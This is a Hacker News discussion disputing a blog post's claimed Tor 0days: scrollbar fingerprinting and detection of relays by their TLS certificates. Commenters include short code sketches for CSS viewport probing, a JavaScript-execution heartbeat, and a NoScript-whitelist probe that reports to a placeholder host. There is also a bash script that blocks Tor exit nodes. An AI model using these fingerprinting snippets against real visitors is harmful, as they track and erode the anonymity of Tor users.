Tor 0day: Stopping Tor Connections (hackerfactor.com)
227 points by a_m0d on July 23, 2020 | 88 comments



Both of these vulnerabilities are bogus.

1. "using JavaScript, you can identify the scrollbar width [...] so an attacker can identify the underlying operating system"

Using JavaScript, you can simply ask Tor Browser what platform it's on using navigator.userAgent, and it will tell you the truth because lying breaks e.g. websites' custom key combinations. Tor Browser will however attempt to anonymize the platform in passive indicators, i.e. HTTP User-Agent: https://blog.torproject.org/new-release-tor-browser-801 (search for "User Agent")
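As a client-side sketch of the two channels being contrasted here (nothing Tor-specific in the code itself):

    // Active fingerprinting: page JavaScript can just ask, and per the
    // linked release notes Tor Browser answers truthfully so that sites'
    // platform-specific behavior (e.g. keyboard shortcuts) keeps working.
    console.log(navigator.userAgent);
    // Passive fingerprinting: the HTTP User-Agent *header* that servers
    // log is normalized across platforms, so it reveals less than the
    // JS-visible value above.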

(EDIT) This was too dismissive, because scrollbar width differences are more fine-grained than platform differences: https://bugzilla.mozilla.org/show_bug.cgi?id=1397996#c5

2. Blocking entry node connections:

"Checking every network connection against every possible Tor node takes time. This is fine if you have a slow network or low traffic volume, but it doesn't scale well for high-volume networks."

If you can muck around in TLS cert fields in real time, you can look up an IP address in a hash table...
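A minimal sketch of that point, with a hypothetical relayIps set that would be refreshed from the public relay list on a schedule:

    // Exact-match lookup is O(1) per connection; a few thousand relay
    // addresses fit trivially in memory.
    const relayIps: Set<string> = new Set(/* ...loaded from the public relay list... */);

    function isKnownRelay(sourceIp: string): boolean {
      return relayIps.has(sourceIp);
    }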

"Second, the list of nodes changes often. This creates a race condition, where there may be a new Tor node that is seen by Tor users but isn't in your block list yet."

Oh no! (clutches pearls)

Not to say that it isn't worthwhile to tidy up the TLS fields some more, but hyping this as a zeroday is absurd.


Yeah, I totally agree, especially with the blocking-entry-nodes part.

There are many other ways to detect Tor connections or nodes and block them. There's enough of them that a whole set of traffic-obfuscation methods called pluggable transports exists: https://trac.torproject.org/projects/tor/wiki/doc/AChildsGar...


Also, it seems to me that whatever they do to make the TLS handshake and certificate look more like a typical web server's, they would never be able to make them match exactly. Tor connections could still be identified by simple things like the self-signed certificate, the random hostname, the hostname<->IP mismatch, and so on.

Trying to fix this would be a never-ending losing battle; I can understand why the Tor project isn't that interested in changing things.


Wrt #1, I think the issue is that scrollbar size makes it easier to tell one Tor user apart from another in the Tor browser, not that you can determine they are running in the Tor browser (or even know their platform from a common fixed set). For most users of Tor and the Tor browser, simply checking that they are coming from a publicly known list of exit node IPs is enough (or if they are already hitting an onion service, then it's obvious).


I'd definitely consider Tor node fingerprinting (2nd issue) to be an important issue. Nonetheless, both issues have been _accepted_ as such by the Tor maintainers, yet they failed to act appropriately.


> I'd definitely consider Tor node fingerprinting (2nd issue) to be an important issue.

Why? If someone knows I'm running Tor, I guess that's not great, but I don't really see the issue.


Is it going to get you in trouble if anybody finds out?


I can't see how this is a "0day".

This post talks about how you can identify a running Tor relay when you connect to its (operator-assigned, public) relay port. You can only "see" these TLS certificate details when you are connecting to the relay yourself. This means it does not allow network operators to detect traffic going to Tor nodes, or between nodes, let alone identify users or deanonymize anyone: to external observers, such traffic looks like typical browser TLS traffic.

So what this does is allow you to identify Tor nodes, which is by definition not a problem for any Tor relay except bridges, which should not be so easily discoverable by a network scan. The problem has been known before, and work has been done so you can now run a Tor bridge without it. As this problem has been publicly discussed and outlined in the very first design documents, it cannot be called a "0day", even if it were more problematic than it actually is.

Tor came up with the concept of "pluggable transports" to address this, very successfully: they allow clients and entry bridges to make Tor traffic look like basically anything you want.


Security is in the eye of the application. Unauthenticated editing isn't an exploit on Wikipedia, but it would be on the CDC's website.

In this case, the fact that a user is using Tor is considered protected information, meaning any exposure of it is in fact an info-leak vulnerability.


The "fact that a user is using Tor" is not discussed in the post. There is zero connection between how Tor nodes generate their TLS certificates and whether or not you can detect that a user is using Tor. All you can do with this information (which is not a secret but a well-discussed tradeoff with no better option) is to identify Tor relays, which are already public.


Tor will never be secure if you're running with JS enabled. Trying to achieve that is way out of scope for the project:

https://support.torproject.org/tbb/tbb-34/


The author of this blog strongly comes across as a person who understands a good deal about finding vulnerabilities, but doesn't really understand the tradeoffs being made in maintaining usable anonymity software such as the Tor browser.

The reported scroll bar width vulnerability is his strongest case. He rightly got a bounty for it. But it's relatively hard to fix, and until recently, the Tor browser also just leaked your window size via Javascript. But they're getting there, slowly.

However, the story about public bridge certificates is pretty unjustified. The response he got from the Tor Project is completely clear, and his proposed solution in trying to impersonate traditional PKI simply won't work against even mediocre attackers. Furthermore, bridge enumeration as a systemic attack might be a problem against censorship systems, but can't rightly be called a '0day'. Private bridges (https://bridges.torproject.org) also solve a lot of the problem.

In the linked ticket, you clearly see that they are trying pretty hard to find a sponsor willing to fund the solution.


> and until recently, the Tor browser also just leaked your window size via Javascript.

Though this was why Tor would always open with the same window size. But yeah, that all fell apart if you maximized.

When did they fix “the leak” itself? Wouldn’t that require intercepting the JavaScript call in the same way that the scroll bar size issue could be fixed?


I believe they implemented panels inside the browser window that force the reported window size to different values.


It's called "letterboxing", and rounds the window size to the nearest 200x100 px when maximized, I think. So while it does make you slightly less unique than just maximizing normally would, that anonymity set is still potentially smaller than the set that can fit everyone, namely the 1000x1000 default. There are methods of detecting screen resolution using CSS that don't require JavaScript, so blocking JavaScript doesn't necessarily protect you from this fingerprinting method.


Fascinating to realize that CSS can do that. I guess it does it by “calling” x.png 1024 times and y.png 768 times? Or running some loop to call 1024x.png and 768y.png...


No loop necessary, maybe just a set of @media rules with e.g. custom .png resources: https://developer.mozilla.org/en-US/docs/Web/CSS/@media
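For illustration, a sketch of generating such a rule set, with a hypothetical /probe/ logging endpoint; the browser only fetches the resource whose rule matches, so the server's request log reveals the viewport width without any JavaScript:

    // Emit one exact-width @media rule per candidate width; repeat the
    // same idea with (height: ...) for the other dimension.
    function widthProbeCss(minWidth: number, maxWidth: number): string {
      const rules: string[] = [];
      for (let w = minWidth; w <= maxWidth; w++) {
        rules.push(
          `@media (width: ${w}px) { body { background-image: url("/probe/w${w}.png"); } }`
        );
      }
      return rules.join("\n");
    }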


Could you expand on "his proposed solution in trying to impersonate traditional PKI simply won't work against even mediocre attackers" ? How would you defeat his proposed solution?


As the Tor Project itself already notes in its reply, it's not feasible "to try to imitate normal SSL certs because that's a fight we can't win (they will always look differently or have distinguishers, as has been the case in the pluggable transports arms race)."

Even if the certificate is valid, there are lots of other distinguishing factors. You can go as far as timing attacks. As the answer alludes to, they have an entire project around obfuscated transports primarily for clients and private bridges. [1]

But there's no need for obfuscation here, as the ORPort could 'simply' be closed, if it weren't such a hassle to actually implement.

[1] https://gitweb.torproject.org/torspec.git/tree/pt-spec.txt


> The bug is simple enough: using JavaScript, you can identify the scrollbar width.

I thought it was accepted and strongly emphasized that running JavaScript in a Tor environment was insecure and could leak information in all sorts of ways, which is why Tor Browser came with NoScript enabled by default.

Is that no longer the case? Is there now an expectation that you should be able to safely run JS in Tor Browser without risk?


JavaScript is unfortunately a major part of the web. As for Tor's core goals, I think they are preventing the leaking of IP information and overcoming censorship. Preventing websites from identifying a Tor browser is probably a secondary goal.

A website operator can already get refreshed lists of Tor exit nodes and simply block them. Your ISP/government can already see that there's Tor traffic coming from your house, and probably "match" at least some activity with an exit node.



I don't understand this bit:

> But there's a third issue: websites can easily determine whether you have allowed JavaScript for them, and if you disable JavaScript by default but then allow a few websites to run scripts (the way most people use NoScript), then your choice of whitelisted websites acts as a sort of cookie that makes you recognizable (and distinguishable), thus harming your anonymity.

How would this work exactly? And if it did work, wouldn't it at the very worst only work on sites for which you had enabled JS? I.e. sites that you had already essentially conceded your anonymity on by choice?

I don't see this as a worthy argument for enabling JS by default and destroying users' anonymity without custom configuration.


You just let the JavaScript send a heartbeat ping. If you served the page but don't receive the ping, you can determine that the user agent did not execute the JavaScript.
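A minimal sketch of such a heartbeat; the viewToken attribute and /js-ping endpoint are hypothetical names, and the server would flag any pageview whose token never arrives as no-JS:

    // Runs in the served page. The server embeds a per-pageview token at
    // render time; echoing it back ties the ping to the exact page hit.
    const token = document.documentElement.dataset.viewToken ?? "";
    fetch("/js-ping?t=" + encodeURIComponent(token), { method: "POST" })
      .catch(() => { /* a failed ping just looks like no-JS to the server */ });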


Sure, but the comment mentions that you would use the 'set of websites that are whitelisted' as an identifier... your method can only check the site you are currently on; it doesn't tell you whether other websites have been whitelisted or not.


AFAIK NoScript whitelists don't respect first-party isolation (so a JS-enabled website can be included in a JS-disabled website), which makes it a relatively simple coordination problem between websites A and B (possibly automated by a third-party tracker included in both A and B; see the sketch below).

In any case, first-party isolation can be subverted: https://news.ycombinator.com/item?id=17947605
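To make the coordination concrete, here is a hedged sketch of the whitelist probe described above; every name in it (probe-a.example, collect.example, p.js) is made up:

    // The page embeds one script per attacker-controlled probe domain:
    //   <script src="https://probe-a.example/p.js" data-probe="a"></script>
    //   <script src="https://probe-b.example/p.js" data-probe="b"></script>
    // Each p.js only runs if NoScript allows its domain, and phones home:
    const probe = (document.currentScript as HTMLScriptElement).dataset.probe;
    new Image().src =
      "https://collect.example/hit?probe=" + probe +
      "&page=" + encodeURIComponent(location.hostname);
    // The subset of probes that report back approximates the visitor's
    // whitelist, an identifier that persists across sites embedding the
    // same probes.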


Yes, with coordination it is possible. I was thinking of the non-coordination issue.


You are not able to safely run JS in Tor Browser, but JS is enabled by default.


Iirc, they have been allowing scripting on HTTPS sites by default for some time now.


>Checking every network connection against every possible Tor node takes time. This is fine if you have a slow network or low traffic volume, but it doesn't scale well for high-volume networks

What? I can't tell if this is sarcastic or not. There are only around 3,000 Tor entry nodes [1]. This is orders of magnitude smaller than the number of entries in the internet routing table, which is around 800k. This means that, in the worst case, if you're an ISP, you can block Tor nodes at the router level with virtually zero impact.

[1] https://onionoo.torproject.org/details?search=flag:Guard%20r...
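A sketch of materializing that list from the Onionoo endpoint in [1], assuming its documented "details" format, where each relay carries an or_addresses array of "ip:port" strings:

    async function fetchGuardIps(): Promise<Set<string>> {
      const res = await fetch(
        "https://onionoo.torproject.org/details?search=flag:Guard%20running:true"
      );
      const doc = (await res.json()) as { relays: { or_addresses: string[] }[] };
      const ips = new Set<string>();
      for (const relay of doc.relays) {
        for (const addr of relay.or_addresses) {
          // Strip the port; IPv6 entries look like "[2001:db8::1]:9001".
          ips.add(addr.replace(/:\d+$/, "").replace(/^\[|\]$/g, ""));
        }
      }
      return ips;
    }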


It’s no problem, he has some regexes you can put in your DPI system to catch the connections instead. Regex is cheap, right? Especially when it is long and complex.


It's like people haven't invented the Bloom filter yet, which you could add in front of a hash table...
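For illustration, a minimal sketch of that arrangement (sizes and hash counts are arbitrary, not tuned for a real false-positive target):

    // A tiny Bloom filter used as a constant-time pre-filter in front of
    // the authoritative relay hash table.
    class BloomFilter {
      private readonly bits: Uint8Array;
      constructor(private readonly size = 1 << 20, private readonly hashes = 4) {
        this.bits = new Uint8Array(size >> 3);
      }
      // Seeded FNV-1a; any cheap hash family works here.
      private hash(value: string, seed: number): number {
        let h = (2166136261 ^ seed) >>> 0;
        for (let i = 0; i < value.length; i++) {
          h ^= value.charCodeAt(i);
          h = Math.imul(h, 16777619);
        }
        return (h >>> 0) % this.size;
      }
      add(ip: string): void {
        for (let s = 0; s < this.hashes; s++) {
          const bit = this.hash(ip, s);
          this.bits[bit >> 3] |= 1 << (bit & 7);
        }
      }
      // false => definitely not a relay, skip the exact table entirely;
      // true  => maybe a relay, confirm with the exact hash-table lookup.
      mightContain(ip: string): boolean {
        for (let s = 0; s < this.hashes; s++) {
          const bit = this.hash(ip, s);
          if ((this.bits[bit >> 3] & (1 << (bit & 7))) === 0) return false;
        }
        return true;
      }
    }

Since almost no traffic is Tor, the filter answers "definitely not" for the vast majority of connections without ever touching the exact table.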


> "After a lot of back-and-forth technical discussions, the Tor Project's representative wrote, "I'm a bit lost with all this info in this ticket. I feel like lots of the discussion here is fruitful but they are more brainstormy and researchy and less fitting to a bug bounty ticket." They concluded with: "Is there a particular bug you want to submit for bug bounty?" In my opinion, describing a vulnerability and mitigation options is not "brainstormy and researchy". To me, it sounds like they were either not competent enough to fix the bug, or they were not interested. In any case, they were just wasting time."

This plus the other descriptions/responses from the project in his post makes me think the project has attracted a lot of people who aren't programmers or can't actually do the valuable work of fixing the thing (though I'd be interested in seeing the specific ticket).

I'd guess this is a bigger issue for projects like Tor that interest people beyond strict programmer types.

The result is you end up with a lot of people filing tickets and writing emails, but very few actually doing the work to fix things, because they don't know how. The few that could figure it out are probably overextended. Having non-programmers interested in helping isn't necessarily a bad thing, since good support people help make it easier to fix issues, but it can become bad if support people bias toward closing issues because they can't fix them, and closing them becomes the goal.

Tor does have some obfuscation proxies (called pluggable transports) to try to disguise the traffic and make it harder to block (there were videos talking about this a few years ago when I looked into how Tor worked; the traffic is disguised as VoIP, among other things). I know China blocks Tor by blocking all the bridge nodes it can find (both public and private) and by using the tricks he describes to slow or stop identified traffic. I think the head of the project cares about these issues.

Not an easy problem to fix, they probably need more programmers. Maybe a direct focus on these issues would help, but it could be they're focused on problems of similar or worse severity (hard to know).


I think the author’s problem is that he finds vulnerabilities by thinking outside the box. Traditionally, vulnerabilities exist when you can inject payloads or get access to somewhere you don’t have access to.

His points are valid, and these are vulnerabilities. However, they read more like feature requests than focused technical vulnerabilities (for example, a use-after-free).


I’m sorry, but to call these minor issues ‘zero-day vulnerabilities’ is a bit rich.

I’ll wait and see if there are any real vulnerabilities in the queue.


> (Many users think that Tor makes them anonymous. But Tor users can be tracked online; they are not anonymous.)

Being tracked and being anonymous feel like two distinct issues. If you were to only see a hash of my username, you could track me, but you couldn't identify me with it. Tracking is definitely something you'd want Tor to stop, but I think the distinction is pretty important.

The other vulnerability is that websites can identify that a user is using Tor. My understanding is that this has always been fairly trivial?

It feels like the real 'story' here is that the Tor Project hasn't been grooming their bug bounty program, and so there may be more serious bugs lurking.


> If you were to only see a hash of my username, you could track me, but you couldn't identify me with it.

Pseudonymous is the word for that sort of "tracking". Tracking just means being tracked, whether they use your real name, a hash of it, or fingerprinting metadata like IP + user-agent string + installed fonts.


Yeah, that's my point. Anonymity to me implies that you cannot determine my true identity. That property still holds here. What doesn't hold is that you cannot determine that I am the same person in multiple locations: a very significant issue, but a much less serious one.


One feeds into the other strongly, though. The odds of an adversary de-anonymizing you go up the more activity the adversary can see. Also, we should look at your anonymity on a per-site/session basis, and if de-anonymization on one site breaks your anonymity on other sites, that is bad.


I fully agree that it is bad and a legitimate issue. As I said, "a very significant issue".


Suppose you visit Facebook via Tor and log in. If you can be traced across the web, then your real name can now be attached to all your activity.


>If you can be traced across the web, then your real name can now be attached to all your activity.

But that's not how Tor works. It's not like a VPN where all your traffic comes out of one node. So even if you logged into Facebook using Tor Browser, it won't be able to correlate your other Tor browsing activity. Even third-party cookies won't work, because Tor Browser has first-party isolation enabled.


> >If you can be traced across the web, then your real name can now be attached to all your activity.

> But that's not how Tor works. It's not like a VPN where all your traffic comes out of one node. So even if you logged into Facebook using Tor Browser, it won't be able to correlate your other Tor browsing activity. Even third-party cookies won't work, because Tor Browser has first-party isolation enabled.

Except that the OP discussed a technique that exposes an attribute of the user's setup which (when combined with other such techniques) allows unique (albeit pseudonymous) identification of the user across requests and sessions (this is called fingerprinting). Add in correlation of the pseudonymous identifier with a real-world identity via use of FB, and the user would be totally hosed.


Wait... you are logging into Facebook and using your real name?

Step 1: Log into Tor.

Step 2: Create a Facebook account using a fake name.

Step 3: Don't add anyone you know in real life as a friend. Best not to search for friends.

Facebook will not be able to connect you now.


What is the point of using Facebook then?


One example would be to join groups that you don't want associated with your IRL identity. Another would be as part of a phishing test while doing a pentest against an organization you're working for.

Or... a bazillion other illegitimate reasons ;).


Yes, totally. As I said, it's a very significant issue, but it requires a separate ability to tie the Tor identity to the user's real identity.


As a person who has, over the years, been recommending Tor and defending it against people claiming it's backdoored and useless, I'm disappointed. Can anybody here on HN give information on how some Tor alternatives and projects with similar goals are holding up?


There's really no reason to be disappointed. The post above neither describes any real vulnerabilities in the service nor offers any real solutions to the problems it poses.


I'm not really using it much, but i2p [0] has been around for a while. It's Java, though, like all other projects of this kind, in case you have anything against that.

[0] https://geti2p.net/en/


IIRC the main issue with I2P is that it doesn't natively offer access to traditional websites the way Tor does. You can configure your browser to connect to a remote HTTP proxy over I2P and access the web that way, but that requires you to find such a proxy first (preferably several such proxies, each with multiple users, so that your traffic across multiple sessions can't be correlated by using the outproxy IP), and setting it up is a lot more complicated than Tor's method of "download Tor browser, click run".



I'm not sure there is a good alternative. Most of the alternatives are built with Java, which (considering tor isn't considered safe with Java enabled) doesn't seem like an improvement.

Is there an alternative that's performant and built with a decent language? Or do the good ones just get snuffed out?


Java is not the same thing as JavaScript


People always say I'm being pedantic when I point that out, but I think it's a really important distinction to make to someone who's not aware, especially in the context of their security.


There's a line about pedantic meaning "you're right but I don't like it", but Java vs JS isn't even close! They're both OO programming languages in the C-like family with garbage collection, but they have completely different execution models, runtimes, use cases, and implementations; their close naming is a bug.


Java is significantly safer than C, which Tor is written in.


Browsing over Tor, I cannot read the article. Instead the entire page source is:

  Banned
...


I believe they are demonstrating one of their 0days: easily identifying Tor traffic based on the packet.

  0Day #1: Blocking Tor Connections the Smart Way
  
  There are two problems with the "block them all" approach. First, there are thousands of Tor nodes. Checking every network connection against every possible Tor node takes time. This is fine if you have a slow network or low traffic volume, but it doesn't scale well for high-volume networks. Second, the list of nodes changes often. This creates a race condition, where there may be a new Tor node that is seen by Tor users but isn't in your block list yet.
  
  However, what if there was a distinct packet signature provided by every Tor node that can be used to detect a Tor network connection? Then you could set the filter to look for the signature and stop all Tor connections. As it turns out, this packet signature is not theoretical.


The packet signature thing is maybe sort of interesting, but it's not hard to block Tor exit nodes; Tor themselves makes this easy:

    #!/bin/bash
    # Fetch the current list of Tor exit nodes that can reach this server,
    # dropping comment lines. Assumes an ipset named "tor" already exists
    # (created once with: ipset create tor hash:ip) and is referenced by
    # a firewall drop rule.
    addresses=$(curl -s https://check.torproject.org/torbulkexitlist?ip=<your-server's-ip> | sed '/^#/d')

    # Only rebuild the set if the download actually returned something,
    # so a failed fetch doesn't wipe the existing block list.
    if [ -n "$addresses" ]; then
        /sbin/ipset flush tor
        echo "$addresses" | while read -r address; do
            /sbin/ipset -q -A tor "$address"
        done
    fi
Add that to a cron job and your form abuse traffic falls off a cliff.


If you feel it necessary to block Tor nodes in some way, I think it's better to block only non-safe HTTP methods (e.g. POST).

Personally, I don't do it, but I understand why it's appealing. I see it as a personal decision (it's your website, after all) and not morally wrong, as some see it.

I once talked to someone working security for a Canadian government agency. They considered it against their charter and/or illegal to block Tor nodes, because it could be blocking legitimate access for Canadian citizens potentially in distress, much to the chagrin of their downstream customers (other agencies). I thought that was pretty interesting.


I think there are also some Canadian court cases protecting the right to speak anonymously over the internet. It's an area where I think our government is doing a pretty decent job (as governments interacting with newfangled technologies go).


Yeah, I don't remember the exact reason they didn't consider it a possibility, but I seem to remember the guy saying it would have saved him a headache but it wasn't in the cards, and that they had to explicitly configure some solution they were using (perhaps Cloudflare?) not to DoS the traffic.


Yeah. I'm sympathetic towards the Tor project in general, but it's also a huge source of nuisances and almost 0% legitimate traffic (in my case). As a beleaguered one-man sysadmin who also wears a full-time dev hat, I just don't have the resources available to build out a more clever rule-based filter for Tor traffic. This approach took me all of about 10 minutes to figure out and deploy across my little network of servers, and it made an entire stream of daily emails disappear immediately.

If I were fortunate enough to be part of a larger team, I'd advocate for exactly what you're suggesting.


I was thinking that Apache / Nginx blocking based on IP match and HTTP method is likely of approximately equivalent complexity.

Also CDNs generally offer this if you use one.


Not quite, unfortunately. Apache's not all that nimble; setting up rewrites for a handful of IPs and methods is pretty easy, but it doesn't have a built-in way to use an external list of IPs (that I'm aware of). I just checked; there are over 1,300 Tor IPs in the result set currently.

I could write a conf.d file to be included in each vhost, and write a script to generate a large rewrite file nightly and "apachectl graceful" it afterward, and that would probably work... but I expect that would have a measurable impact on response times and, again, I'm not hosting governmental sites or anything that could reasonably be considered vital to the health and well-being of innocent Tor users.


The article also mentions banning IP ranges and its disadvantages. The described detection of Tor traffic seems more bulletproof and performant.

Hopefully the Tor devs consider the proposed enhancements to make the traffic less vulnerable to identification. As he has already dug into the source code, maybe it would be easiest for him to submit a PR, for a better chance of getting the issue fixed.


I believe the article mentions that, but also notes your method works for low-traffic situations. The 0day is a high-performance alternative.


ipset is very fast (http://web.archive.org/web/20160514091316/http://daemonkeepe...).

The author's approach requires examining a certificate to see if it matches a pattern that may or may not change in the future.


That identifies Tor clients, not connections from Tor exit nodes to servers.


That sounds like it can only detect client<->Tor node or Tor node<->Tor node traffic. Exit node<->server connections don't involve that generated certificate.


Sorry, this seems bogus. There are a lot of ways to block Tor connections, and Tor doesn't try to make it particularly hard to identify ordinary entry nodes. That's what bridge nodes are for, if you need it.


Bugs and 0days aside, isn't the writer's main issue here a communication problem with the Tor Project?


I don’t know why the Tor browser allows JavaScript to be enabled by default to begin with.

I don’t allow JavaScript to run on my mobile browser because of the disturbing crash logs I’ve seen in WebKit the few times I have enabled JS.


Could someone in the know inform me as to whether or not my knee-jerk reaction of "couldn't this individual possibly contribute to the Tor project instead?" is warranted?


They are contributing to the Tor project by sending detailed vulnerability reports. As for demanding that they fix/upstream changes themselves, then yes, that's likely too big of an ask, as even these reports are a gift. Tor has paid employees. "PRs welcome, wontfix" is not acceptable for security vulnerabilities in a security product.


To add to this: when reporting bugs (security or otherwise), I regularly feel like it's not worth my time to fix them, because it takes me 2 hours to try to get the code to compile in the first place; sometimes you need to sign legalese to be allowed to help; then I still need to figure out the project's structure and decide how best to fix it (perhaps discussing it with the maintainer(s)); and then I haven't even started writing code yet. Meanwhile, I know that when maintaining my own software, it takes me 30 seconds to open up the project, and I'll be literally 5 times faster working on a fix with all the context that is in my head, usually without needing to consult with others.

It's as if you kept trying to fix other people's cars when you know only the principles of a combustion engine, own an electric motorcycle yourself, and the cars are all very different from each other: I'd much rather have someone who actually knows what they're doing do it; it would save all parties a lot of trouble. Diagnosing problems very specifically should already save them a lot of the time they would otherwise have to put in.


> it takes me 2 hours to try to get the code to compile in the first place

And then the tests won't pass on master!


Tell me about it. Instructions working on the first attempt on a standard Debian system are quite rare. Bigger projects with more contributors put more work into making it work, but also have more complex processes, so the result is that it's almost always trouble. Or they're simply more complex than necessary: no, I don't want to download 12GB of IDE, SDK/compiler, emulated operating systems, and custom versions of dependencies installed system-wide in order to compile and run this project. I just want the code and dependencies in a local folder, and to apt install a compiler, so I can simply build the apk and adb install it on my phone without screwing up my system or having to set up a new container/VM for the purpose.


If someone gives you a gift, you are not forced to accept it. Tor's paid employees probably have something else to work on, given that they are paid with Tor's money, not the bug reporter's money. Frankly, the issue about blocking connections is pretty useless: the author themselves admits that the underlying issue cannot be fixed, since the list of relays is public. And it's not a security issue anyway: of course your traffic carrier will always be able to drop your packets, but nobody considers this a security issue for any other application.

So they are basically reporting trivial issues (this one is trivial, at least; I cannot judge the others they say they have) and expecting that people paid by someone else will now care about just that. That doesn't look very smart.


This sort of reminds me of the Burning Man Project. There is money, full-time staff, and a lot of attention paid to the main product, but a lack of excellent results.

I generally chalk this up to leadership issues.


> Unfortunately, sometimes companies are non-responsive. At that point, I have a few options. I can sell the vulnerability to someone else who will certainly exploit it. I can just let it sit -- maybe the bug will be fixed by coincidence or become obsolete, or maybe I'll find another use for it later. (I have a large collection of sitting vulnerabilities, some dating back decades.)

This sounds so interesting to me to hear about. Can anyone recommend a podcast where like-minded engineers discuss things like this? I'd love to vicariously live through their hacking adventures.


Sitting on bugs is just being an asshole, not a great adventure. In most cases there really isn't that much to tell anyway: you find a bug, either on your own or in a customer project, and for some reason it doesn't get fixed. Perhaps management accepts the risk and you're bound by an NDA. Perhaps you plan to make a patch so people can also update when you publish, but you haven't found the time for the patch, and so it continues (I know of a denial of service in Nextcloud like this: it's trivial to find (go ahead), and out of scope for their security program, so Nextcloud tells us it's a wontfix; we're still meaning to release a patch, but it has been two months now, though it's only denial of service anyway). If the bug just so happens to be useful in the future, it's like using a public bug, except you're the only one who knows about it, and you can feel really proud of yourself for putting everyone at risk in the meantime.


I have gotten the impression over the last few years that the Tor Project has embraced social justice and diversity to the detriment of their software.


I find that when I come across comments or jokes that might expose biases, rather than interrogating the person, you can expose those biases just by asking the simplest questions, the ones that seem too obvious to ask. When someone makes a joke that might be described as biased (usually with a more particular word), just ask them to explain the joke. That is usually more revealing than calling the speaker a name.

So, I don't want to infer your opinions, but I want to ask: what about social justice and diversity is to the detriment of their software?


People said the same about Mozilla, but FF is doing just fine.


It's more important to support FF, for a million reasons, than to not support them because of their internal culture.

Remove those reasons and I would prefer a more open, less toxic culture, and would switch browsers to support independent thought over groupthink.


This is lent some credence by the fact that the Tails website links to riseup.net, which hosts Rose City Antifa.



